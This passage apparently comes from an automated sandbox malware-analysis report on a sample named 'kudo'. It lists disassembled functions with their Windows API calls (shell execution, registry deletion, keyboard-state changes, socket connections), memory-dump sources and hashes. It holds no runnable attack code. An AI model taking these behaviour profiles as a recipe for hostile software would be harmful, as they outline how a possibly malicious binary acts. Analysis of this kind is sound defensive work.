                                                      • GetDeviceCaps.GDI32(00000000,0000005A,?,?,0088902A,?,?,000000FF,00000000,?,000000FF,?,00000001,?), ref: 008861FE
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0088620A
                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00886246
                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00886257
                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00886291
                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 008862B1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                      • String ID:
                                                      • API String ID: 3864802216-0
                                                      • Opcode ID: 6ca8bb65719b74e3d1187f624edabac57bc57afcde7bf7125ffad1bca1a8de9c
                                                      • Instruction ID: a014702b11b1b5a3517981b2b52cae55eb9af2dd9b530cc263c3d101049577b7
                                                      • Opcode Fuzzy Hash: 6ca8bb65719b74e3d1187f624edabac57bc57afcde7bf7125ffad1bca1a8de9c
                                                      • Instruction Fuzzy Hash: 2E317A72200210AFEB119F148C8AFAA3BA9FF59761F040065FE08DA292D7759C51CB60
                                                      Function 00801424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fe83d50528ffad9bb6a70fd4beda68b1ff80a5d71b994512a6c445bd713ecde2
                                                      • Instruction ID: c4416e24900c006c6539f06fbc35cd4116717909c9b507493b451da044fd97f6
                                                      • Opcode Fuzzy Hash: fe83d50528ffad9bb6a70fd4beda68b1ff80a5d71b994512a6c445bd713ecde2
                                                      • Instruction Fuzzy Hash: 67718C70900509EFDF54CF98CC89ABEBB79FF85324F108159F915EA2A1C734AA11CBA4
                                                      Function 0088B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsWindow.USER32(00A12418), ref: 0088B3EB
                                                      • IsWindowEnabled.USER32(00A12418), ref: 0088B3F7
                                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0088B4DB
                                                      • SendMessageW.USER32(00A12418,000000B0,?,?), ref: 0088B512
                                                      • IsDlgButtonChecked.USER32(?,?), ref: 0088B54F
                                                      • GetWindowLongW.USER32(00A12418,000000EC), ref: 0088B571
                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0088B589
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                      • String ID:
                                                      • API String ID: 4072528602-0
                                                      • Opcode ID: 0a0a3fe4a7e72eb1de57397cf4370ed636b9049fdcb35f0fcebdd4e677cfff01
                                                      • Instruction ID: 620e507eca49535ce326dbc78ce0a614cbd264f2214c2048322cc46645e36f47
                                                      • Opcode Fuzzy Hash: 0a0a3fe4a7e72eb1de57397cf4370ed636b9049fdcb35f0fcebdd4e677cfff01
                                                      • Instruction Fuzzy Hash: 78718C34600604EFDF20AFA4C895FBA7BB9FF89300F144169EA46D73A2D731A980CB54
                                                      Function 0087F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 0087F448
                                                      • _memset.LIBCMT ref: 0087F511
                                                      • ShellExecuteExW.SHELL32(?), ref: 0087F556
                                                        • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                        • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                        • Part of subcall function 0081FC86: _wcscpy.LIBCMT ref: 0081FCA9
                                                      • GetProcessId.KERNEL32(00000000), ref: 0087F5CD
                                                      • CloseHandle.KERNEL32(00000000), ref: 0087F5FC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                      • String ID: @
                                                      • API String ID: 3522835683-2766056989
                                                      • Opcode ID: ba39ca7c40426c69fc74ba7a7ce7cd1b50c8f9f684f88ae1922d9cd5edf97495
                                                      • Instruction ID: 88fe66f6e8ea97d60037d6dbc912cfc83a7ab306eecbd4a0158fa929b2baf20c
                                                      • Opcode Fuzzy Hash: ba39ca7c40426c69fc74ba7a7ce7cd1b50c8f9f684f88ae1922d9cd5edf97495
                                                      • Instruction Fuzzy Hash: F4617CB5A006199FCB14DF69C8819AEBBF5FF48310F148069E959EB392CB30ED41CB95
                                                      Function 00860F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetParent.USER32(?), ref: 00860F8C
                                                      • GetKeyboardState.USER32(?), ref: 00860FA1
                                                      • SetKeyboardState.USER32(?), ref: 00861002
                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00861030
                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 0086104F
                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00861095
                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 008610B8
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: 75e3028f52b6dad84b062740812b64ced3ad652ddc717bd0e6e761842ac29233
                                                      • Instruction ID: 29ab680d425660ce2eb81222eed6b1e15fd981a91581effebabeb6f459c89e76
                                                      • Opcode Fuzzy Hash: 75e3028f52b6dad84b062740812b64ced3ad652ddc717bd0e6e761842ac29233
                                                      • Instruction Fuzzy Hash: 9451D260604BD53DFF3642388C19BB6BEA9BB06304F0D8589E2D4C58D3D699DCD8DB52
                                                      Function 00860D66 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetParent.USER32(00000000), ref: 00860DA5
                                                      • GetKeyboardState.USER32(?), ref: 00860DBA
                                                      • SetKeyboardState.USER32(?), ref: 00860E1B
                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00860E47
                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00860E64
                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00860EA8
                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00860EC9
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessagePost$KeyboardState$Parent
                                                      • String ID:
                                                      • API String ID: 87235514-0
                                                      • Opcode ID: 21038db1ca45a6124ccf2de9593c5f490063c2aa3320f863def537b25190775d
                                                      • Instruction ID: 47fe7216e3be4682df1d80ac3fc9c62dc10af48aa6b8a5caf85adb43847e7d28
                                                      • Opcode Fuzzy Hash: 21038db1ca45a6124ccf2de9593c5f490063c2aa3320f863def537b25190775d
                                                      • Instruction Fuzzy Hash: E95124A05486E53DFB3283648C45B7B7FA9FB06300F098988E1D4CA4C3D396AC88DB54
                                                      Function 008655FD Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _wcsncpy$LocalTime
                                                      • String ID:
                                                      • API String ID: 2945705084-0
                                                      • Opcode ID: f6f09ac9b8c2f9d4138f2c7a287e0fca5bd96e63a41129e4da6e5f3dd77eed7a
                                                      • Instruction ID: 88d1ded013ae6db91eb1e5ae3e5521303c7d7fbf222f99636fb437434ac25adb
                                                      • Opcode Fuzzy Hash: f6f09ac9b8c2f9d4138f2c7a287e0fca5bd96e63a41129e4da6e5f3dd77eed7a
                                                      • Instruction Fuzzy Hash: E3419565C11628B6CB11EBB89C469CFB3B8FF04310F504556F618E3121EA34A2C5C7A7
                                                      Function 00863671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0086466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00863697,?), ref: 0086468B
                                                        • Part of subcall function 0086466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00863697,?), ref: 008646A4
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 008636B7
                                                      • _wcscmp.LIBCMT ref: 008636D3
                                                      • MoveFileW.KERNEL32(?,?), ref: 008636EB
                                                      • _wcscat.LIBCMT ref: 00863733
                                                      • SHFileOperationW.SHELL32(?), ref: 0086379F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                      • String ID: \*.*
                                                      • API String ID: 1377345388-1173974218
                                                      • Opcode ID: 747fc82a78ad0e975a7e3851b1c58afb02f508ccf2959abd1f9110979de1b4cc
                                                      • Instruction ID: 8254fc1b036b2858d1c10606e8e916b17fd2898c5c58cf965236183cf8b41f84
                                                      • Opcode Fuzzy Hash: 747fc82a78ad0e975a7e3851b1c58afb02f508ccf2959abd1f9110979de1b4cc
                                                      • Instruction Fuzzy Hash: 99418171508344AEC752EF68D4419DFB7E8FF99340F00182EB49AC3251EA34D689C753
                                                      Function 00887291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 008872AA
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00887351
                                                      • IsMenu.USER32(?), ref: 00887369
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008873B1
                                                      • DrawMenuBar.USER32 ref: 008873C4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                                      • String ID: 0
                                                      • API String ID: 3866635326-4108050209
                                                      • Opcode ID: 9a8bb324f42c121553a9af06bda3b3867d8c8470e44d18407c5bba2930c55376
                                                      • Instruction ID: a0920f153de7557491408005d41f72a49b95297992a4fa962e93cf89671ce91b
                                                      • Opcode Fuzzy Hash: 9a8bb324f42c121553a9af06bda3b3867d8c8470e44d18407c5bba2930c55376
                                                      • Instruction Fuzzy Hash: A5412575A04208AFDB20EF54D884EAABBB8FB08314F648429FD15E7360D730ED50EB51
                                                      Function 00880FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00880FD4
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00880FFE
                                                      • FreeLibrary.KERNEL32(00000000), ref: 008810B5
                                                        • Part of subcall function 00880FA5: RegCloseKey.ADVAPI32(?), ref: 0088101B
                                                        • Part of subcall function 00880FA5: FreeLibrary.KERNEL32(?), ref: 0088106D
                                                        • Part of subcall function 00880FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00881090
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00881058
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                      • String ID:
                                                      • API String ID: 395352322-0
                                                      • Opcode ID: e8402555f1f206f5abef21422522a7219235c6f162bdfc815e6e1aee8e2e31f1
                                                      • Instruction ID: 11459d939bc5473978f4f4877296b8434d72ce7869612e16e13a497a6441de96
                                                      • Opcode Fuzzy Hash: e8402555f1f206f5abef21422522a7219235c6f162bdfc815e6e1aee8e2e31f1
                                                      • Instruction Fuzzy Hash: 4E31F971901509BFDF15AB94DC89AFEB7BCFF08300F10416AF601E2151EB749E8A9BA1
                                                      Function 008862CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 008862EC
                                                      • GetWindowLongW.USER32(00A12418,000000F0), ref: 0088631F
                                                      • GetWindowLongW.USER32(00A12418,000000F0), ref: 00886354
                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00886386
                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 008863B0
                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 008863C1
                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 008863DB
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: LongWindow$MessageSend
                                                      • String ID:
                                                      • API String ID: 2178440468-0
                                                      • Opcode ID: a9e4feadb5fb12a74be1a2e2fd7627da80415fe073179479a7fbcdea393b4b7d
                                                      • Instruction ID: 4e0066dbe208f7ccf0f29715fee1c363c70668a7af62be461a280833a72a044b
                                                      • Opcode Fuzzy Hash: a9e4feadb5fb12a74be1a2e2fd7627da80415fe073179479a7fbcdea393b4b7d
                                                      • Instruction Fuzzy Hash: CF31F230644251AFDB21DF18EC85F5537E1FB5A714F1902A8F601DF2B2EB71A890DB51
                                                      Function 0085DAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0085DB2E
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0085DB54
                                                      • SysAllocString.OLEAUT32(00000000), ref: 0085DB57
                                                      • SysAllocString.OLEAUT32(?), ref: 0085DB75
                                                      • SysFreeString.OLEAUT32(?), ref: 0085DB7E
                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 0085DBA3
                                                      • SysAllocString.OLEAUT32(?), ref: 0085DBB1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                      • String ID:
                                                      • API String ID: 3761583154-0
                                                      • Opcode ID: f52b14d7e2d6063e2aa6c852b32e8210c533b0b93d57445c916015dd2a8485b6
                                                      • Instruction ID: 68bfb23319b0da0b466a8b88ccdb0925b5c5a193ea4f36756111e0b00358af9c
                                                      • Opcode Fuzzy Hash: f52b14d7e2d6063e2aa6c852b32e8210c533b0b93d57445c916015dd2a8485b6
                                                      • Instruction Fuzzy Hash: 3B218176600219AFEF20DFA8DC88CBB73ADFB09371B118526FE14DB251D6709C458765
                                                      Function 00876173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00877D8B: inet_addr.WS2_32(00000000), ref: 00877DB6
                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 008761C6
                                                      • WSAGetLastError.WS2_32(00000000), ref: 008761D5
                                                      • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 0087620E
                                                      • connect.WSOCK32(00000000,?,00000010), ref: 00876217
                                                      • WSAGetLastError.WS2_32 ref: 00876221
                                                      • closesocket.WS2_32(00000000), ref: 0087624A
                                                      • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00876263
                                                      Memory Dump Source
